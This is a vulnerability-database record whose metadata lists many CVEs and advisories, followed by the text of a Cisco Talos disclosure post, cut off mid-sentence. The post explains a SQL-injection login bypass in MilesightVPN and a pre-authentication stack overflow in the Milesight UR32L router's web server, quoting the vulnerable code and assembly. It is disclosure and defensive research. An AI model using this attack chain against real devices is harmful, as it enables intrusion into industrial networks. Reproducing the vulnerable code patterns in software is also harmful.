{"cve": "CVE-2022-38105", "epss": 0.00084, "percentile": 0.34389, "modified": "2023-06-03"}, {"cve": "CVE-2022-38393", "epss": 0.00046, "percentile": 0.13993, "modified": "2023-06-03"}, {"cve": "CVE-2022-38451", "epss": 0.00125, "percentile": 0.4573, "modified": "2023-06-03"}, {"cve": "CVE-2022-38452", "epss": 0.00054, "percentile": 0.19681, "modified": "2023-06-03"}, {"cve": "CVE-2022-38458", "epss": 0.00082, "percentile": 0.33757, "modified": "2023-06-03"}, {"cve": "CVE-2022-38459", "epss": 0.0008, "percentile": 0.32916, "modified": "2023-06-03"}, {"cve": "CVE-2022-38715", "epss": 0.00082, "percentile": 0.33579, "modified": "2023-06-03"}, {"cve": "CVE-2022-39045", "epss": 0.0007, "percentile": 0.28616, "modified": "2023-06-03"}, {"cve": "CVE-2022-40220", "epss": 0.00067, "percentile": 0.27599, "modified": "2023-06-03"}, {"cve": "CVE-2022-40222", "epss": 0.00105, "percentile": 0.41588, "modified": "2023-06-03"}, {"cve": "CVE-2022-40701", "epss": 0.00063, "percentile": 0.25166, "modified": 
"2023-06-03"}, {"cve": "CVE-2022-40969", "epss": 0.00067, "percentile": 0.27599, "modified": "2023-06-03"}, {"cve": "CVE-2022-40985", "epss": 0.00131, "percentile": 0.4676, "modified": "2023-06-03"}, {"cve": "CVE-2022-41030", "epss": 0.00113, "percentile": 0.43701, "modified": "2023-06-03"}, {"cve": "CVE-2022-41154", "epss": 0.0008, "percentile": 0.32903, "modified": "2023-06-03"}, {"cve": "CVE-2022-41991", "epss": 0.00081, "percentile": 0.33151, "modified": "2023-06-03"}, {"cve": "CVE-2022-42484", "epss": 0.00122, "percentile": 0.45297, "modified": "2023-06-03"}, {"cve": "CVE-2022-42490", "epss": 0.00143, "percentile": 0.48848, "modified": "2023-06-03"}, {"cve": "CVE-2022-42493", "epss": 0.00143, "percentile": 0.48848, "modified": "2023-06-03"}, {"cve": "CVE-2023-22299", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-22306", "epss": 0.00075, "percentile": 0.30893, "modified": "2023-07-23"}, {"cve": "CVE-2023-22319", "epss": 0.00076, "percentile": 0.31529, "modified": "2023-07-23"}, {"cve": "CVE-2023-22365", "epss": 0.00063, "percentile": 0.25247, "modified": "2023-07-23"}, {"cve": "CVE-2023-22371", "epss": 0.0013, "percentile": 0.47069, "modified": "2023-07-23"}, {"cve": "CVE-2023-22653", "epss": 0.00083, "percentile": 0.34271, "modified": "2023-08-06"}, {"cve": "CVE-2023-22659", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-22844", "epss": 0.00106, "percentile": 0.42306, "modified": "2023-07-23"}, {"cve": "CVE-2023-23546", "epss": 0.00104, "percentile": 0.41726, "modified": "2023-07-23"}, {"cve": "CVE-2023-23547", "epss": 0.0005, "percentile": 0.16443, "modified": "2023-07-23"}, {"cve": "CVE-2023-23550", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-23571", "epss": 0.00046, "percentile": 0.14054, "modified": "2023-07-25"}, {"cve": "CVE-2023-23902", "epss": 0.00202, "percentile": 0.57268, "modified": "2023-07-23"}, {"cve": "CVE-2023-23907", "epss": 
0.00087, "percentile": 0.35637, "modified": "2023-07-23"}, {"cve": "CVE-2023-24018", "epss": 0.00047, "percentile": 0.14308, "modified": "2023-08-06"}, {"cve": "CVE-2023-24019", "epss": 0.00087, "percentile": 0.36243, "modified": "2023-08-06"}, {"cve": "CVE-2023-24496", "epss": 0.00044, "percentile": 0.10781, "modified": "2023-07-25"}, {"cve": "CVE-2023-24497", "epss": 0.00044, "percentile": 0.10781, "modified": "2023-07-25"}, {"cve": "CVE-2023-24519", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-24520", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-24582", "epss": 0.00107, "percentile": 0.42712, "modified": "2023-07-23"}, {"cve": "CVE-2023-24583", "epss": 0.00121, "percentile": 0.45535, "modified": "2023-07-23"}, {"cve": "CVE-2023-24595", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-25081", "epss": 0.00053, "percentile": 0.19336, "modified": "2023-08-06"}, {"cve": "CVE-2023-25124", "epss": 0.00053, "percentile": 0.19336, "modified": "2023-08-06"}, {"cve": "CVE-2023-25582", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}, {"cve": "CVE-2023-25583", "epss": 0.00083, "percentile": 0.34307, "modified": "2023-07-23"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", 
"privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.talosintelligence.com/router-researcher-vulnerability-spotlight-23/", "reporter": "Cisco Talos", "references": [], "cvelist": ["CVE-2018-3948", "CVE-2018-3949", "CVE-2018-3950", "CVE-2018-3951", "CVE-2018-3953", "CVE-2018-3955", "CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073", "CVE-2019-11823", "CVE-2019-5016", "CVE-2019-5017", "CVE-2019-5101", "CVE-2019-5102", "CVE-2020-11117", "CVE-2020-27648", "CVE-2020-27649", "CVE-2020-27650", "CVE-2020-27651", "CVE-2020-27652", "CVE-2020-27653", "CVE-2020-27654", "CVE-2020-27655", "CVE-2020-27656", "CVE-2020-27657", "CVE-2020-27658", "CVE-2020-27659", "CVE-2020-27660", "CVE-2021-21743", "CVE-2021-21744", "CVE-2021-21745", "CVE-2021-21746", "CVE-2021-21747", "CVE-2021-21748", "CVE-2021-21749", "CVE-2021-21816", "CVE-2021-21817", "CVE-2021-21818", "CVE-2021-21819", "CVE-2021-21820", "CVE-2021-21913", "CVE-2022-21178", "CVE-2022-21182", "CVE-2022-21201", "CVE-2022-21238", "CVE-2022-21809", "CVE-2022-22140", "CVE-2022-22144", "CVE-2022-23103", "CVE-2022-23399", "CVE-2022-23918", "CVE-2022-23919", "CVE-2022-24005", "CVE-2022-24029", "CVE-2022-24910", "CVE-2022-25172", "CVE-2022-25932", "CVE-2022-25995", "CVE-2022-25996", "CVE-2022-26002", "CVE-2022-26007", "CVE-2022-26009", "CVE-2022-26020", "CVE-2022-26023", "CVE-2022-26042", "CVE-2022-26075", "CVE-2022-26085", "CVE-2022-26342", "CVE-2022-26346", "CVE-2022-26376", "CVE-2022-26420", "CVE-2022-26510", "CVE-2022-26518", "CVE-2022-26780", "CVE-2022-26782", "CVE-2022-27172", "CVE-2022-27178", "CVE-2022-27185", "CVE-2022-27630", 
"CVE-2022-27631", "CVE-2022-27633", "CVE-2022-27660", "CVE-2022-28127", "CVE-2022-28664", "CVE-2022-28665", "CVE-2022-28689", "CVE-2022-29481", "CVE-2022-29888", "CVE-2022-30543", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-33897", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271", "CVE-2022-35401", "CVE-2022-36279", "CVE-2022-36429", "CVE-2022-37337", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38105", "CVE-2022-38393", "CVE-2022-38451", "CVE-2022-38452", "CVE-2022-38458", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493", "CVE-2023-22299", "CVE-2023-22306", "CVE-2023-22319", "CVE-2023-22365", "CVE-2023-22371", "CVE-2023-22653", "CVE-2023-22659", "CVE-2023-22844", "CVE-2023-23546", "CVE-2023-23547", "CVE-2023-23550", "CVE-2023-23571", "CVE-2023-23902", "CVE-2023-23907", "CVE-2023-24018", "CVE-2023-24019", "CVE-2023-24496", "CVE-2023-24497", "CVE-2023-24519", "CVE-2023-24520", "CVE-2023-24582", "CVE-2023-24583", "CVE-2023-24595", "CVE-2023-25081", "CVE-2023-25124", "CVE-2023-25582", "CVE-2023-25583"], "immutableFields": [], "lastseen": "2023-08-06T21:25:55", "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:4F819DF0-ED81-4B04-B5DD-F17BE53CA6B6", "AKB:6F5BF822-55B4-4EEA-AC56-1A4AA236453A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1671", "CPAI-2018-1073", "CPAI-2018-1098", "CPAI-2019-0673", "CPAI-2019-0674", "CPAI-2019-0675", "CPAI-2020-3466"]}, {"type": "cnvd", "idList": ["CNVD-2021-53335", "CNVD-2021-53338", "CNVD-2021-53340", "CNVD-2021-53341", "CNVD-2021-92819", "CNVD-2021-92820", "CNVD-2021-92821", "CNVD-2021-92822", "CNVD-2021-92823", "CNVD-2021-92824", "CNVD-2021-92825", 
"CNVD-2021-94832", "CNVD-2022-59174", "CNVD-2022-59175", "CNVD-2022-59176", "CNVD-2022-59177", "CNVD-2022-59178", "CNVD-2022-59179", "CNVD-2022-59180", "CNVD-2022-59181", "CNVD-2022-59182", "CNVD-2022-59183", "CNVD-2022-59184", "CNVD-2022-59185", "CNVD-2022-59186", "CNVD-2022-59188", "CNVD-2022-59189", "CNVD-2022-59190", "CNVD-2022-59191", "CNVD-2022-59192", "CNVD-2022-82013", "CNVD-2022-82014", "CNVD-2022-82015", "CNVD-2022-82016", "CNVD-2022-82017", "CNVD-2022-82018", "CNVD-2022-82020", "CNVD-2022-82021", "CNVD-2022-82022", "CNVD-2022-82023", "CNVD-2023-15940", "CNVD-2023-15941", "CNVD-2023-17064", "CNVD-2023-17065", "CNVD-2023-17073", "CNVD-2023-17074", "CNVD-2023-17075", "CNVD-2023-17076", "CNVD-2023-17077", "CNVD-2023-17078", "CNVD-2023-17079", "CNVD-2023-17080", "CNVD-2023-17082", "CNVD-2023-17083", "CNVD-2023-17084", "CNVD-2023-17093"]}, {"type": "cve", "idList": ["CVE-2018-3948", "CVE-2018-3949", "CVE-2018-3950", "CVE-2018-3951", "CVE-2018-3953", "CVE-2018-3955", "CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073", "CVE-2019-11823", "CVE-2019-5016", "CVE-2019-5017", "CVE-2019-5101", "CVE-2019-5102", "CVE-2020-11117", "CVE-2020-27648", "CVE-2020-27649", "CVE-2020-27650", "CVE-2020-27651", "CVE-2020-27652", "CVE-2020-27653", "CVE-2020-27654", "CVE-2020-27655", "CVE-2020-27656", "CVE-2020-27657", "CVE-2020-27658", "CVE-2020-27659", "CVE-2020-27660", "CVE-2021-21743", "CVE-2021-21744", "CVE-2021-21745", "CVE-2021-21746", "CVE-2021-21747", "CVE-2021-21748", "CVE-2021-21749", "CVE-2021-21816", "CVE-2021-21817", "CVE-2021-21818", "CVE-2021-21819", "CVE-2021-21820", "CVE-2021-21913", "CVE-2022-21178", "CVE-2022-21182", "CVE-2022-21201", "CVE-2022-21238", "CVE-2022-21809", "CVE-2022-22140", "CVE-2022-22144", "CVE-2022-23103", "CVE-2022-23399", "CVE-2022-23918", "CVE-2022-23919", "CVE-2022-24005", 
"CVE-2022-24029", "CVE-2022-24910", "CVE-2022-25172", "CVE-2022-25932", "CVE-2022-25995", "CVE-2022-25996", "CVE-2022-26002", "CVE-2022-26007", "CVE-2022-26009", "CVE-2022-26020", "CVE-2022-26023", "CVE-2022-26042", "CVE-2022-26075", "CVE-2022-26085", "CVE-2022-26342", "CVE-2022-26346", "CVE-2022-26376", "CVE-2022-26420", "CVE-2022-26510", "CVE-2022-26518", "CVE-2022-26780", "CVE-2022-26782", "CVE-2022-27172", "CVE-2022-27178", "CVE-2022-27185", "CVE-2022-27630", "CVE-2022-27631", "CVE-2022-27633", "CVE-2022-27660", "CVE-2022-28127", "CVE-2022-28664", "CVE-2022-28665", "CVE-2022-28689", "CVE-2022-29481", "CVE-2022-29888", "CVE-2022-30543", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-33897", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271", "CVE-2022-35401", "CVE-2022-36279", "CVE-2022-36429", "CVE-2022-37337", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38105", "CVE-2022-38393", "CVE-2022-38451", "CVE-2022-38452", "CVE-2022-38458", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493", "CVE-2023-22299", "CVE-2023-22306", "CVE-2023-22319", "CVE-2023-22365", "CVE-2023-22371", "CVE-2023-22653", "CVE-2023-22659", "CVE-2023-22844", "CVE-2023-23546", "CVE-2023-23547", "CVE-2023-23550", "CVE-2023-23571", "CVE-2023-23902", "CVE-2023-23907", "CVE-2023-24018", "CVE-2023-24019", "CVE-2023-24496", "CVE-2023-24497", "CVE-2023-24519", "CVE-2023-24520", "CVE-2023-24582", "CVE-2023-24583", "CVE-2023-24595", "CVE-2023-25081", "CVE-2023-25124", "CVE-2023-25582", "CVE-2023-25583"]}, {"type": "ics", "idList": ["ICSA-19-122-03"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C4FF7781BBBB932203C69F488B232C0F"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141621", 
"OPENVAS:1361412562310141702"]}, {"type": "openwrt", "idList": ["OPENWRT-SA-2019-11-05-3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152646", "PACKETSTORM:152647", "PACKETSTORM:152648", "PACKETSTORM:152649", "PACKETSTORM:152650", "PACKETSTORM:152651", "PACKETSTORM:152652", "PACKETSTORM:152653", "PACKETSTORM:152654", "PACKETSTORM:152655", "PACKETSTORM:152656"]}, {"type": "seebug", "idList": ["SSV:99311", "SSV:99312", "SSV:99313"]}, {"type": "talos", "idList": ["TALOS-2018-0617", "TALOS-2018-0618", "TALOS-2018-0619", "TALOS-2018-0620", "TALOS-2018-0625", "TALOS-2018-0746", "TALOS-2018-0747", "TALOS-2018-0748", "TALOS-2018-0749", "TALOS-2018-0750", "TALOS-2018-0751", "TALOS-2018-0752", "TALOS-2018-0753", "TALOS-2018-0754", "TALOS-2018-0755", "TALOS-2018-0756", "TALOS-2019-0775", "TALOS-2019-0776", "TALOS-2019-0893", "TALOS-2020-1051", "TALOS-2020-1058", "TALOS-2020-1059", "TALOS-2020-1061", "TALOS-2020-1065", "TALOS-2020-1066", "TALOS-2020-1071", "TALOS-2020-1086", "TALOS-2020-1087", "TALOS-2021-1281", "TALOS-2021-1282", "TALOS-2021-1283", "TALOS-2021-1284", "TALOS-2021-1285", "TALOS-2021-1313", "TALOS-2021-1316", "TALOS-2021-1317", "TALOS-2021-1318", "TALOS-2021-1319", "TALOS-2021-1320", "TALOS-2021-1321", "TALOS-2021-1361", "TALOS-2022-1454", "TALOS-2022-1455", "TALOS-2022-1456", "TALOS-2022-1457", "TALOS-2022-1458", "TALOS-2022-1459", "TALOS-2022-1462", "TALOS-2022-1463", "TALOS-2022-1468", "TALOS-2022-1469", "TALOS-2022-1470", "TALOS-2022-1471", "TALOS-2022-1472", "TALOS-2022-1473", "TALOS-2022-1474", "TALOS-2022-1475", "TALOS-2022-1476", "TALOS-2022-1477", "TALOS-2022-1478", "TALOS-2022-1481", "TALOS-2022-1482", "TALOS-2022-1483", "TALOS-2022-1484", "TALOS-2022-1495", "TALOS-2022-1496", "TALOS-2022-1499", "TALOS-2022-1500", "TALOS-2022-1501", "TALOS-2022-1502", "TALOS-2022-1503", "TALOS-2022-1504", "TALOS-2022-1505", "TALOS-2022-1506", "TALOS-2022-1507", "TALOS-2022-1509", "TALOS-2022-1510", "TALOS-2022-1511", "TALOS-2022-1518", "TALOS-2022-1519", 
"TALOS-2022-1520", "TALOS-2022-1521", "TALOS-2022-1522", "TALOS-2022-1523", "TALOS-2022-1570", "TALOS-2022-1571", "TALOS-2022-1572", "TALOS-2022-1573", "TALOS-2022-1575", "TALOS-2022-1576", "TALOS-2022-1577", "TALOS-2022-1578", "TALOS-2022-1579", "TALOS-2022-1580", "TALOS-2022-1586", "TALOS-2022-1590", "TALOS-2022-1592", "TALOS-2022-1595", "TALOS-2022-1596", "TALOS-2022-1597", "TALOS-2022-1598", "TALOS-2022-1605", "TALOS-2022-1606", "TALOS-2022-1607", "TALOS-2022-1608", "TALOS-2022-1609", "TALOS-2022-1610", "TALOS-2022-1611", "TALOS-2022-1612", "TALOS-2022-1613", "TALOS-2022-1615", "TALOS-2022-1637", "TALOS-2022-1638", "TALOS-2022-1639", "TALOS-2022-1640", "TALOS-2022-1641", "TALOS-2022-1642", "TALOS-2023-1694", "TALOS-2023-1695", "TALOS-2023-1696", "TALOS-2023-1697", "TALOS-2023-1698", "TALOS-2023-1699", "TALOS-2023-1700", "TALOS-2023-1701", "TALOS-2023-1702", "TALOS-2023-1703", "TALOS-2023-1704", "TALOS-2023-1705", "TALOS-2023-1706", "TALOS-2023-1710", "TALOS-2023-1711", "TALOS-2023-1712", "TALOS-2023-1713", "TALOS-2023-1714", "TALOS-2023-1715", "TALOS-2023-1716", "TALOS-2023-1718", "TALOS-2023-1723"]}, {"type": "talosblog", "idList": ["TALOSBLOG:29DAF5785414A83AEFB51D866CCCA165", "TALOSBLOG:5249F941D38D1066B30BDEFF9C2C9F1B", "TALOSBLOG:57AE67D092003BFBA2D8AC2BAB81030D", "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "TALOSBLOG:6C4E58699BB90DB08778A81DD308563F", "TALOSBLOG:85B7EC75A8466C2794CC85DD62E3FDA3", "TALOSBLOG:91B7495CB321B7DE7F1C5325CBEC5490", "TALOSBLOG:BB780E8AC252593B415F668CD7BEBD82", "TALOSBLOG:C5180F1E61B3AFB5FC8CDD116ED91BB4", "TALOSBLOG:D359C8798DB4F71E8813CE20072A5C76", "TALOSBLOG:D8BE2B71060558D1F88AC6B123A6160E", "TALOSBLOG:DA58A7666C6D2C98A3062307E13300AA", "TALOSBLOG:F88EBAD7133FBE1A890AF58350AF7356"]}, {"type": "thn", "idList": ["THN:3CF746E3360C2F304DD3C6835409BDB4", "THN:4F054B1D96214D69BD4FF49AC6854672"]}, {"type": "threatpost", "idList": ["THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:4659C6740BE64D50B985F32560628891"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-32607", "1337DAY-ID-32608", "1337DAY-ID-32609", "1337DAY-ID-32610", "1337DAY-ID-32611", "1337DAY-ID-32612", "1337DAY-ID-32613", "1337DAY-ID-32614", "1337DAY-ID-32615", "1337DAY-ID-32616", "1337DAY-ID-32617"]}]}, "score": {"value": 10.1, "vector": "NONE"}, "vulnersScore": 10.1}, "_state": {"dependencies": 1691358301, "score": 1698857807}, "_internal": {"score_hash": "7f678e8ea571d031ab2a138a3668ea05"}}
{"talosblog": [{"lastseen": "2023-07-25T19:26:27", "description": "* Cisco Talos discovered 17 vulnerabilities (63 CVEs) in the Milesight UR32L router and five vulnerabilities (six CVEs) in the Milesight MilesightVPN remote access solution software.\n * An attacker could exploit the vulnerabilities discovered to completely compromise the UR32L and MilesightVPN.\n * This post presents an attack scenario in which the UR32L is only reachable through the MilesightVPN remote access solution. The blog explains how an attacker could exploit the MilesightVPN and then fully compromise the UR32L.\n\n\nCisco Talos recently discovered several vulnerabilities in Milesight's UR32L - an ARMv7 Linux-based industrial cellular router -- and Milesight's MilesightVPN, a remote access solution for Milesight devices.\n\nIn all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs. Talos is disclosing these vulnerabilities despite no official fix from Milesight, in adherence to Cisco's vulnerability disclosure policy. Milesight did not respond appropriately during the [90-day period as outlined in the policy](<https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html>).\n\nThe MilesightVPN is the remote access solution for Milesight devices not directly exposed to the internet. The MilesightVPN will perform this through a VPN system, making the VPN setup for the devices and the administrator easy. The MilesightVPN provides an HTTP admin page to monitor devices' tunnel connection to the MilesightVPN itself and generate VPN configuration to join devices' VPNs. By default, the MilesightVPN binds the HTTP server ports and the one VPN port on all interfaces. This software must be installed on a server machine reachable by the administrator and devices. 
Because of this, the most popular setup for administrators is to expose the MilesightVPN to the internet.\n\nThe Milesight UR32L is an industrial router that offers cellular capabilities. The router supports multiple users with different permissions. It offers a shell with restricted access capabilities, along with many common industrial router features and functionalities. The Milesight UR32L does not include the ability to obtain and act with root privileges.\n\n## Attack scenario overview\n\nIn this blog post, Talos will present an attack scenario in which an adversary targets the Milesight UR32L, where the router is not exposed to the internet and instead uses a VPN tunnel to provide access to its internal network and the router itself. We considered the scenario where the device is managed through MilesightVPN. This software must be installed on a machine that is reachable by the UR32L router and the administrator. For the purposes of this post, we assume the MilesightVPN server is exposed to the internet.\n\nMilesightVPN uses OpenVPN as the underlying VPN system. Using a well-established VPN system is an excellent choice: OpenVPN is a well-known, tested VPN technology, which means it is less likely to have major security issues. But MilesightVPN builds services around the OpenVPN tunnel, such as an HTTP server to monitor the connections and to generate OpenVPN configurations for joining the device's VPN. By default, MilesightVPN binds the HTTP server ports and the OpenVPN port on all interfaces. So, if MilesightVPN is accessible on the internet, those services are by default accessible, too.\n\nThe UR32L has its own HTTP server, which allows users to manage the router configuration. 
We are also assuming the UR32L's HTTP server is only accessible from the VPN and the MilesightVPN server is the only node that can generate a VPN configuration.\n\n_An illustration of the proposed attack scenario._\n\nThe graphic below includes only the vulnerabilities relevant to this proposed attack scenario. This graphic shows the steps that an attacker could take to obtain root access to a Milesight UR32L:\n\n\n\n## Attack walkthrough\n\nAfter locating the IP address of the MilesightVPN server, the attacker still cannot log in to the HTTP admin page due to the lack of valid credentials. The HTTP server login page of MilesightVPN looks like this:\n\n\n\nFrom this point, an attacker could exploit [TALOS-2023-1701](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701>) (CVE-2023-22319) to bypass the login and access the admin web pages on MilesightVPN. This vulnerability is a SQL injection in the `LoginAuth` function responsible for checking the provided credentials. The check uses SQL without a prepared statement or any form of sanitization. The `LoginAuth` code is shown below:\n \n \n function LoginAuth(res,postdata,connection){ \n console.info('#######log.node:loginauth start'); \n var sha512=crypto.createHash('sha512'); \n sha512.update(postdata.pwd); \n var pwd=sha512.digest('hex'); \n [1] $sql=\"select * from user where user='\"+postdata.user+\"' and passwd='\"+pwd+\"'\"; \n [2] connection.query($sql).then(function(data){ \n var result={}; \n if(data['error']) \n { \n [...] \n } \n else \n { \n if(data['result'].length>0) \n { \n var dt=data['result']; \n result['status']=1; \n var token=generateToken(dt[0]['user']); \n var exp=new Date(\n new Date().getTime()+\n expiretime*1000).toUTCString(); \n res.setHeader('Set-Cookie',['token='+token]); \n console.info('#######log.node:loginauth success'); \n res.write(JSON.stringify(result)); \n res.end(); \n } \n else \n { \n [...] 
\n } \n } \n }); \n } \n \n\nAt `[1]`, the function composes the SQL query that checks whether the provided username and password correspond to those of an existing user. Then, at `[2]`, the query is executed; if the resulting table is not empty, a JWT corresponding to the first matched user is crafted and placed in the response header as the value of `Set-Cookie`. This function is vulnerable to SQL injection because the \"preparation\" of the query string is performed through string concatenation instead of a prepared statement. This SQL injection can allow an attacker to bypass the authentication of the HTTP server and gain admin access.\n\nAfter bypassing the login page, an attacker would be presented with the following interface. The example below includes an interface with multiple devices registered and a single device that has an active connection.\n\n\n\nFrom here, an attacker can glean information about the devices connected to the server and their IPs. Furthermore, it is possible to obtain an OpenVPN configuration file to join the VPN tunnel and communicate with the devices that were previously unreachable. The attacker can now communicate with all devices in the VPN. The following image is the HTTP server login page of the Milesight UR32L router:\n\n\n\nFrom here, several attack paths are possible. [TALOS-2023-1697](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697>) (CVE-2023-23902) is a pre-authentication stack-based buffer overflow that can lead to arbitrary remote code execution (RCE).\n\nThe attacker's only requirement is to be able to communicate with the router's HTTP server. This vulnerability is a pre-authentication, stack-based buffer overflow in the `decrypt_string` function of the `uhttpd` binary, the UR32L's HTTP server binary. This function is responsible for decrypting the login password provided for the webpage login. 
The password sent from the browser is first AES-encrypted and then Base64-encoded. The `decrypt_string` function will Base64 decode and then AES decrypt the password.\n\nThe `uhttpd` binary is not a Position Independent Executable (PIE), meaning that the binary is always loaded at the same virtual memory addresses, but the libraries are Position Independent Code (PIC). This makes it possible for an attacker to perform a code reuse attack using the binary's own code without any information leak, unless the attacker needs to reuse some of the libraries' code. Furthermore, the code reuse attack scenario is the path of least resistance for exploitation because no stack canary is used in this binary.\n\nThe binary is executed as root and makes use of functions such as `system` and `popen`; as such, one of the options would be to mount an attack aiming to execute OS commands.\n\nThe following is a code snippet of `uhttpd`'s `decrypt_string`:\n \n \n void decrypt_string(\n char *b64_encrypted_password,\n char *decrypted_password,\n size_t size_decrypted_password)\n { \n [...] \n uchar stack_decrypted_string [72]; \n [... init the AES_key variable] \n [... init the AES_IV variable] \n [... calculate the __size variable value ...] \n base64_decoded_string_start = (uchar *)malloc(__size); \n [...] \n memset(base64_decoded_string_start,0,__size); \n processed_len = 0; \n base64_decode_string_cursor = base64_decoded_string_start; \n do { \n // this check ensures the string is fully Base64 decoded before decrypting it \n if ((password_len_ - padding) <= processed_len) { \n *base64_decode_string_cursor = '\\0'; \n ctx = EVP_CIPHER_CTX_new(); \n [... check error ...] \n cipher_type = EVP_aes_128_cbc(); \n processed_len = EVP_DecryptInit_ex(\n ctx,\n cipher_type,\n (ENGINE *)0x0,\n AES_key,\n AES_IV); \n [... check error ...] 
\n [1] processed_len = EVP_DecryptUpdate(\n ctx,\n stack_decrypted_string,\n &output_len,\n base64_decoded_string_start,\n (base64_decode_string_cursor + \n (-1 - base64_decoded_string_start))); \n [... check error ...] \n processed_len = output_len; \n iVar3 = EVP_DecryptFinal_ex(\n ctx,\n stack_decrypted_string + output_len,&output_len); \n [... check error ...] \n processed_len = processed_len + output_len; \n EVP_CIPHER_CTX_free(ctx); \n stack_decrypted_string[processed_len] = '\\0'; \n EVP_cleanup(); \n ERR_free_strings(); \n free(base64_decoded_string_start); \n [2] strncpy(\n decrypted_password,\n (char*)stack_decrypted_string,\n size_decrypted_password); \n return; \n } \n [...] \n [3] \t[... base64 decode ...] \n } while( true ); \n } \n \n\nThis function has three parameters: the `b64_encrypted_password` parameter is the AES-encrypted and Base64-encoded password string that will be Base64 decoded and then AES decrypted; `decrypted_password` is the destination buffer where the decoded and decrypted password will be copied; `size_decrypted_password` is the size of the `decrypted_password` buffer. At `[3]` the `b64_encrypted_password` string is Base64 decoded and then, at `[1]`, the decoded value is AES decrypted into `stack_decrypted_string`, a 72-byte stack buffer. Eventually, at `[2]`, `size_decrypted_password` bytes will be copied from the `stack_decrypted_string` buffer into the `decrypted_password` buffer.\n\nOnly `size_decrypted_password` bytes are copied into `decrypted_password`, which prevents any type of buffer overflow in the `decrypted_password` buffer.\n\nAt `[1]`, OpenSSL's `EVP_DecryptUpdate` function performs the AES decryption of the Base64-decoded, user-controlled data into the `stack_decrypted_string` stack buffer. The `stack_decrypted_string` stack buffer is fixed in size, while the decrypted string, which is provided by the user, can be longer than that buffer. 
This can lead to a buffer overflow in the `stack_decrypted_string` buffer.\n\nEssentially, the login API accepts the password as the Base64 encoding of the AES encryption of the password content. This function is used to decode the Base64 string and then AES decrypt it to obtain the actual password value. The vulnerability is that the password can overflow a stack buffer, overwriting the stack content, including the stored return address.\n\nThe exploitation of this vulnerability becomes easier because of the epilogue of this function:\n \n \n strncpy(\n decrypted_password,\n (char*)stack_decrypted_string,\n size_decrypted_password); \n return; \n \n\nThe `decrypted_password` is a buffer in the caller's stack space where the decoded and decrypted password is saved. In assembly, this looks like:\n \n \n ldr r0, [sp,#0xc] \n bl strncpy \n add sp, sp, #0x84 \n pop {r4,r5,r6,r7,r8,r9,r10,r11,pc} \n \n\nThe function that copies the plaintext password into the `decrypted_password` array, which is also the last function call before 